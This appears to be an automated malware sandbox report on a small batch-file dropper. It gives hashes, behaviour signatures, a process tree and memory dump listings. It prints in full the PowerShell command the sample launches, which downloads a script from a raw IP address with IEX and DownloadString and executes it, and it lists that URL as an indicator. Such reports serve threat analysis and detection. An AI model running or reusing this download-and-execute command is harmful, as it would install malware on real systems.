Analysis
- max time kernel: 12s
- max time network: 42s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 03-11-2020 01:10
Static task: static1
Behavioral task: behavioral1
- Sample: af1dcc03472a3760e7f068ff48725448.bat
- Resource: win7v20201028 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: af1dcc03472a3760e7f068ff48725448.bat
- Resource: win10v20201028 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: af1dcc03472a3760e7f068ff48725448.bat
- Size: 214B
- MD5: 5cef3f9a231d5cf5d5fbd670d721dccd
- SHA1: baf5a46fcbe4fae2a70e5d22449ff4ed03a93e33
- SHA256: f14eb9a5eaf915aa1fb082741ab3c1d275e0dfed65d67b6dabc2cc7b0d01923f
- SHA512: d51a3c23cd1e5a3b079f76697fd46e4ba37fe3890d8ae29c5106d364d86e2f662fee98483c1c6febaf5087a8c3f4b5b11aff9ff633fd263b939ab416442fda02
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs:
  ps1.dropper  http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448
Signatures
- Blacklisted process makes network request (1 IoCs)
  Processes:
  flow  pid   process
  5     1912  powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
  pid   process
  1912  powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
  pid   process
  1912  powershell.exe
  1912  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  description              pid   process
  Token: SeDebugPrivilege  1912  powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
  description                        pid   process  target process
  PID 1700 wrote to memory of 1912   1700  cmd.exe  powershell.exe
  PID 1700 wrote to memory of 1912   1700  cmd.exe  powershell.exe
  PID 1700 wrote to memory of 1912   1700  cmd.exe  powershell.exe
  PID 1700 wrote to memory of 1912   1700  cmd.exe  powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\af1dcc03472a3760e7f068ff48725448.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1700
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/af1dcc03472a3760e7f068ff48725448');Invoke-KSBCZTZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1912
Network
MITRE ATT&CK Matrix
Downloads
- memory/1912-0-0x0000000000000000-mapping.dmp
- memory/1912-1-0x0000000073F20000-0x000000007460E000-memory.dmp  Filesize: 6.9MB
- memory/1912-2-0x00000000023C0000-0x00000000023C1000-memory.dmp  Filesize: 4KB
- memory/1912-3-0x00000000047A0000-0x00000000047A1000-memory.dmp  Filesize: 4KB
- memory/1912-4-0x0000000002600000-0x0000000002601000-memory.dmp  Filesize: 4KB
- memory/1912-5-0x0000000005240000-0x0000000005241000-memory.dmp  Filesize: 4KB
- memory/1912-8-0x0000000005680000-0x0000000005681000-memory.dmp  Filesize: 4KB
- memory/1912-13-0x00000000056F0000-0x00000000056F1000-memory.dmp  Filesize: 4KB
- memory/1912-14-0x0000000006150000-0x0000000006151000-memory.dmp  Filesize: 4KB
- memory/1912-21-0x0000000006290000-0x0000000006291000-memory.dmp  Filesize: 4KB
- memory/1912-22-0x00000000062C0000-0x00000000062C1000-memory.dmp  Filesize: 4KB